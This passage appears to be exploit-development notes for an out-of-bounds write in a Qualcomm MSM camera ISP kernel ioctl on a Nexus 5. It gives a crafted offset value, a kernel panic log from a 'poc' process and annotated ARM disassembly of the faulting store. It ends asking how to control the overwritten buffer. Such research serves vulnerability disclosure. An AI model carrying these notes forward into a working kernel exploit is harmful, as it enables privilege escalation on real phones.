         || ( (reg_cfg_cmd[0].u.dmi_info.lo_tbl_offset + reg_cfg_cmd[0].u.dmi_info.len) > cmd_len )
        printf("[-] set param error: lo_tbl_offset 0x%x len 0x%x cmd_len 0x%x\n",
            reg_cfg_cmd[0].u.dmi_info.len, cmd_len);
        return -1;

then set hitbloffset = 0x40000000;

will be write a value to (kptr + hitbloffset /4)

crash log

[   66.742418] audit: audit_lost=10612 audit_rate_limit=20 audit_backlog_limit=64
[   66.742537] audit: rate limit exceeded
[   95.769933] Unable to handle kernel paging request at virtual address 2d7c3000
[   95.770933] pgd = e2800000
[   95.771331] [2d7c3000] *pgd=00000000
[   95.771760] Internal error: Oops: 805 [#1] PREEMPT SMP ARM
[   95.772189] CPU: 0    Not tainted  (3.4.0-gc46bfe8 #1)
[   95.772426] PC is at msm_isp_proc_cmd+0x534/0x8b4
[   95.772646] LR is at msm_isp_proc_cmd+0x52c/0x8b4
[   95.773035] pc : [<c07093b0>]    lr : [<c07093a8>]    psr: 60000013
[   95.773046] sp : eae83d70  ip : eae83d70  fp : eae83dc4
[   95.773624] r10: 00000001  r9 : ed7c3008  r8 : 00001dc8
[   95.773844] r7 : 00000000  r6 : ed658000  r5 : 2d7c3000  r4 : eb3c5ac0
[   95.774231] r3 : 00000080  r2 : ed7c3008  r1 : 00000009  r0 : 00000000
[   95.774456] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[   95.774846] Control: 10c5787d  Table: 2ac0006a  DAC: 00000015
[   95.775228]
[   95.775234] PC: 0xc0709330:
[   95.775634] 9330  e1a00006 e59510c4 e2899001 e59330ec e2833004 e0811003 ebffb372 e5942008
[   95.777807] 9350  e1a0300a e1590122 2a000043 e594100c e3510004 e283a004 e5936000 1affffec
[   95.779820] 9370  e7953008 e6ff0076 e59510c4 e1a06826 e59330ec e2833004 e0811003 ebffb361
[   95.781969] 9390  eaffffe5 e7962008 e59600c4 e59220ec e0800002 ebffb36b e2892008 e1a09002
[   95.784122] 93b0  e4850008 e5941008 e15a0121 3affff5a e51b9030 e1a05006 e51b7048 e51b6038
[   95.786282] 93d0  e1d980b2 e1d920b0 eaffff99 e51b2038 e283a008 e795e008 e59510c4 e4920008
[   95.788261] 93f0  e59e30ec e0811003 e50b2038 ebffb345 eaffffc9 e5163008 e3730005 8a0000a3
[   95.790423] 9410  e59520b4 e2830004 e5921004 e5922000 e2811001 e0621001 e1510000 3a00009b
[   95.792586]
[   95.792592] LR: 0xc0709328:
[   95.792982] 9328  0a00002b e7953008 e1a00006 e59510c4 e2899001 e59330ec e2833004 e0811003
[   95.795129] 9348  ebffb372 e5942008 e1a0300a e1590122 2a000043 e594100c e3510004 e283a004
[   95.797288] 9368  e5936000 1affffec e7953008 e6ff0076 e59510c4 e1a06826 e59330ec e2833004
[   95.799289] 9388  e0811003 ebffb361 eaffffe5 e7962008 e59600c4 e59220ec e0800002 ebffb36b
[   95.801456] 93a8  e2892008 e1a09002 e4850008 e5941008 e15a0121 3affff5a e51b9030 e1a05006
[   95.803621] 93c8  e51b7048 e51b6038 e1d980b2 e1d920b0 eaffff99 e51b2038 e283a008 e795e008
[   95.805615] 93e8  e59510c4 e4920008 e59e30ec e0811003 e50b2038 ebffb345 eaffffc9 e5163008
[   95.807773] 9408  e3730005 8a0000a3 e59520b4 e2830004 e5921004 e5922000 e2811001 e0621001
[   95.809952]
[   95.809958] SP: 0xeae83cf0:
[   95.810359] 3cf0  ee002180 000080d0 00000010 c07093b0 60000013 ffffffff eae83d5c 00001dc8
[   95.812540] 3d10  ed7c3008 00000001 eae83dc4 eae83d28 c0106f98 c0100254 00000000 00000009
[   95.814709] 3d30  ed7c3008 00000080 eb3c5ac0 2d7c3000 ed658000 00000000 00001dc8 ed7c3008
[   95.816695] 3d50  00000001 eae83dc4 eae83d70 eae83d70 c07093a8 c07093b0 60000013 ffffffff
[   95.818868] 3d70  22222222 22222222 22222222 ed7c3000 eae82030 00000000 eb3c5ac0 eb3c5ac8
[   95.821050] 3d90  00000000 eae83e24 00000003 c00c56c0 ed658000 ed658138 eae83e24 eae83e24
[   95.823042] 3db0  00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828 c0708e88 c00c56c0 ed658004
[   95.825055] 3dd0  eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c c070a5fc c00c56c0 c113a488
[   95.827216]
[   95.827222] IP: 0xeae83cf0:
[   95.827619] 3cf0  ee002180 000080d0 00000010 c07093b0 60000013 ffffffff eae83d5c 00001dc8
[   95.829797] 3d10  ed7c3008 00000001 eae83dc4 eae83d28 c0106f98 c0100254 00000000 00000009
[   95.831955] 3d30  ed7c3008 00000080 eb3c5ac0 2d7c3000 ed658000 00000000 00001dc8 ed7c3008
[   95.833943] 3d50  00000001 eae83dc4 eae83d70 eae83d70 c07093a8 c07093b0 60000013 ffffffff
[   95.835926] 3d70  22222222 22222222 22222222 ed7c3000 eae82030 00000000 eb3c5ac0 eb3c5ac8
[   95.838082] 3d90  00000000 eae83e24 00000003 c00c56c0 ed658000 ed658138 eae83e24 eae83e24
[   95.840235] 3db0  00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828 c0708e88 c00c56c0 ed658004
[   95.842374] 3dd0  eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c c070a5fc c00c56c0 c113a488
[   95.844378]
[   95.844384] FP: 0xeae83d44:
[   95.844948] 3d44  00000000 00001dc8 ed7c3008 00000001 eae83dc4 eae83d70 eae83d70 c07093a8
[   95.846939] 3d64  c07093b0 60000013 ffffffff 22222222 22222222 22222222 ed7c3000 eae82030
[   95.849107] 3d84  00000000 eb3c5ac0 eb3c5ac8 00000000 eae83e24 00000003 c00c56c0 ed658000
[   95.851258] 3da4  ed658138 eae83e24 eae83e24 00000003 eb3a8cc0 eae83de4 eae83dc8 c070a828
[   95.853419] 3dc4  c0708e88 c00c56c0 ed658004 eae83e24 eb3a8cc0 eae83e04 eae83de8 c0738a6c
[   95.855414] 3de4  c070a5fc c00c56c0 c113a488 0000000c 00000000 eae83ed4 eae83e08 c07320c4
[   95.857583] 3e04  c0738710 ed131000 00000002 0000001a e99866c0 c0738704 bea979e8 00040006
[   95.859751] 3e24  04000001 b6d07400 b6d18030 00000001 eae83e40 c0a957e8 c01e3954 ed131000
[   95.861757]
[   95.861763] R2: 0xed7c2f88:
[   95.862325] 2f88  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.864481] 2fa8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.866465] 2fc8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.868646] 2fe8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 42424242
[   95.870820] 3008  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.872833] 3028  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.874999] 3048  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.877169] 3068  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.879335]
[   95.879340] R4: 0xeb3c5a40:
[   95.879740] 5a40  c1b815c0 eb3c5284 eb3c5784 00000000 00000000 00000000 00307300 32313563
[   95.881912] 5a60  36376300 e9000038 00000001 00000000 f3affad8 0000000a 00000871 00000000
[   95.883904] 5a80  0000e4a6 e9a77b45 00000000 00000000 e9a77b50 00000000 00000000 00000000
[   95.886052] 5aa0  ea0762a0 ec001800 ea076280 0000000a 00000001 00000001 e9ad5e00 00000000
[   95.888204] 5ac0  40000000 00000000 00000200 00000009 00000000 00000000 00000000 00000000
[   95.890365] 5ae0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.892338] 5b00  0000018e 0000018e 0000006f 00000001 00000000 00000000 00000000 00000000
[   95.894492] 5b20  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.896665]
[   95.896671] R6: 0xed657f80:
[   95.897063] 7f80  00000001 ee3d1d80 00000000 c051aea4 00000000 00000000 00000000 00000000
[   95.899223] 7fa0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.901377] 7fc0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.903354] 7fe0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.905481] 8000  ee132a00 ed660004 c119daa0 ed8ee800 00000010 ed62d040 00020000 00000000
[   95.907631] 8020  00000000 00000003 00000000 00000000 00000000 00000010 00000000 00000000
[   95.909799] 8040  00000000 00000000 00000051 00000014 00000000 ed660054 c119daf0 00000000
[   95.911790] 8060  0000000c ed61c680 c119e108 c119e0f8 00000000 00656676 00000000 00000000
[   95.913783]
[   95.913789] R9: 0xed7c2f88:
[   95.914187] 2f88  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.916355] 2fa8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.918509] 2fc8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[   95.920669] 2fe8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 42424242
[   95.922651] 3008  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.924641] 3028  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.926803] 3048  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.928810] 3068  42424242 42424242 42424242 42424242 42424242 42424242 42424242 42424242
[   95.930993] Process poc (pid: 3053, stack limit = 0xeae822f0)
[   95.931407] Stack: (0xeae83d70 to 0xeae84000)
[   95.931627] 3d60:                                     22222222 22222222 22222222 ed7c3000
[   95.932027] 3d80: eae82030 00000000 eb3c5ac0 eb3c5ac8 00000000 eae83e24 00000003 c00c56c0
[   95.932429] 3da0: ed658000 ed658138 eae83e24 eae83e24 00000003 eb3a8cc0 eae83de4 eae83dc8
[   95.932663] 3dc0: c070a828 c0708e88 c00c56c0 ed658004 eae83e24 eb3a8cc0 eae83e04 eae83de8
[   95.933064] 3de0: c0738a6c c070a5fc c00c56c0 c113a488 0000000c 00000000 eae83ed4 eae83e08
[   95.933467] 3e00: c07320c4 c0738710 ed131000 00000002 0000001a e99866c0 c0738704 bea979e8
[   95.933701] 3e20: 00040006 04000001 b6d07400 b6d18030 00000001 eae83e40 c0a957e8 c01e3954
[   95.934109] 3e40: ed131000 00000002 ed135bc0 0000000a 0000001a e99866c0 eae83e74 eae83e68
[   95.934510] 3e60: c0a958d4 c01c91d0 eae83eb4 00000001 eae83e94 c117fc38 60000013 00000001
[   95.934911] 3e80: 00000003 00000000 eae82000 c01c91dc eae83ecc eae83ea0 c01c91dc c0a9821c
[   95.935140] 3ea0: 00000000 a19364fd c01c91dc ed653800 eb3a8cc0 bea979e8 c00c56c0 ed171a28
[   95.935537] 3ec0: bea979e8 00000000 eae83ee4 eae83ed8 c0738700 c0731dfc eae83f0c eae83ee8
[   95.935936] 3ee0: c072c504 c07386ec c072c458 eb3a8cc0 00000003 c00c56c0 eb3a8cc0 ed171a28
[   95.936340] 3f00: eae83f74 eae83f10 c02831c8 c072c464 c1a656c0 0000000b 00000000 eae83f08
[   95.936569] 3f20: 00000000 eae83f00 eae82000 b6d18030 bea979e8 c00c56c0 eb3a8cc0 00000003
[   95.936970] 3f40: eae82000 00000000 eae83f64 00000000 bea979e8 c00c56c0 eb3a8cc0 00000003
[   95.937369] 3f60: eae82000 00000000 eae83fa4 eae83f78 c02833f8 c0282dc8 00000000 00000000
[   95.937598] 3f80: c0107644 b6d18030 bea979e8 00000003 00000036 c0107644 00000000 eae83fa8
[   95.937998] 3fa0: c0107400 c0283388 b6d18030 bea979e8 00000003 c00c56c0 bea979e8 bea979d8
[   95.938396] 3fc0: b6d18030 bea979e8 00000003 00000036 000080f4 00000000 00000000 bea97a7c
[   95.938794] 3fe0: 40000000 bea979c8 0000e443 00011244 80000010 00000003 00000000 00000000
[   95.939054] [<c07093b0>] (msm_isp_proc_cmd+0x534/0x8b4) from [<c070a828>] (msm_isp_ioctl+0x238/0x3b0)
[   95.939488] [<c070a828>] (msm_isp_ioctl+0x238/0x3b0) from [<c0738a6c>] (subdev_do_ioctl+0x368/0x554)
[   95.939923] [<c0738a6c>] (subdev_do_ioctl+0x368/0x554) from [<c07320c4>] (video_usercopy+0x2d4/0x594)
[   95.940359] [<c07320c4>] (video_usercopy+0x2d4/0x594) from [<c0738700>] (subdev_ioctl+0x20/0x24)
[   95.940785] [<c0738700>] (subdev_ioctl+0x20/0x24) from [<c072c504>] (v4l2_ioctl+0xac/0x160)
[   95.941044] [<c072c504>] (v4l2_ioctl+0xac/0x160) from [<c02831c8>] (do_vfs_ioctl+0x40c/0x5c0)
[   95.941473] [<c02831c8>] (do_vfs_ioctl+0x40c/0x5c0) from [<c02833f8>] (sys_ioctl+0x7c/0x8c)
[   95.941906] [<c02833f8>] (sys_ioctl+0x7c/0x8c) from [<c0107400>] (ret_fast_syscall+0x0/0x30)
[   95.942318] Code: e0800002 ebffb36b e2892008 e1a09002 (e4850008)
[   95.945358] ---[ end trace 73ebd40746349828 ]---
[   95.946015] Kernel panic - not syncing: Fatal exception
[   96.946453] Rebooting in 5 seconds..
[  101.948083] Going down for restart now
[  101.948958] Calling SCM to disable SPMI PMIC arbiter

No errors detected
Boot info:
Last boot reason: kernel_panic

crash disassembly

nexus 5 - cm13

// Excerpt from msm_isp_proc_cmd (backtrace frame msm_isp_proc_cmd+0x534). The
// function's entry and the loop head loc_C070912C are outside this listing, so
// any bounds check that may precede the loop is not visible here.
LDR             R2, [R6,R8]            // R2 = *(R6 + R8)
LDR             R0, [R6,#0xC4]         // R0 = *(R6 + 0xC4)
LDR             R2, [R2,#0xEC]         // R2 = *(R2 + 0xEC)
ADD             R0, R0, R2             // R0 = R0 + R2: first argument register under the ARM AAPCS
BL              msm_camera_io_r        // hardware register read; return value comes back in R0 (the note below observed r0 = 0)
ADD             R2, R9, #8
MOV             R9, R2                 // R9 += 8, done via R2
// Post-indexed store: *R5 = R0, then R5 += 8. This is the bracketed word
// e4850008 on the panic's "Code:" line. No comparison of R5 against the end of
// the destination buffer (the notes below identify it as the kzalloc'd
// cfg_data) appears in this fragment; if none exists elsewhere in the
// function, the destination cursor can run past the allocation. The defensive
// fix is to validate the user-supplied offset and length against cmd_len
// before this loop runs.
STR             R0, [R5],#8            // !!! crash
LDR             R1, [R4,#8]            // R1 = *(R4 + 8)
CMP             R10, R1,LSR#2          // unsigned compare of R10 (presumably the loop counter) with R1 / 4
BCC             loc_C070912C           // loop back while R10 < R1 / 4

r0 = 0

so could write 0 to (kptr + hitbloffset /4)

kptr is cfg_data

cfg_data = kzalloc(proc_cmd->cmd_len, GFP_KERNEL);

how to control cfg_data ?
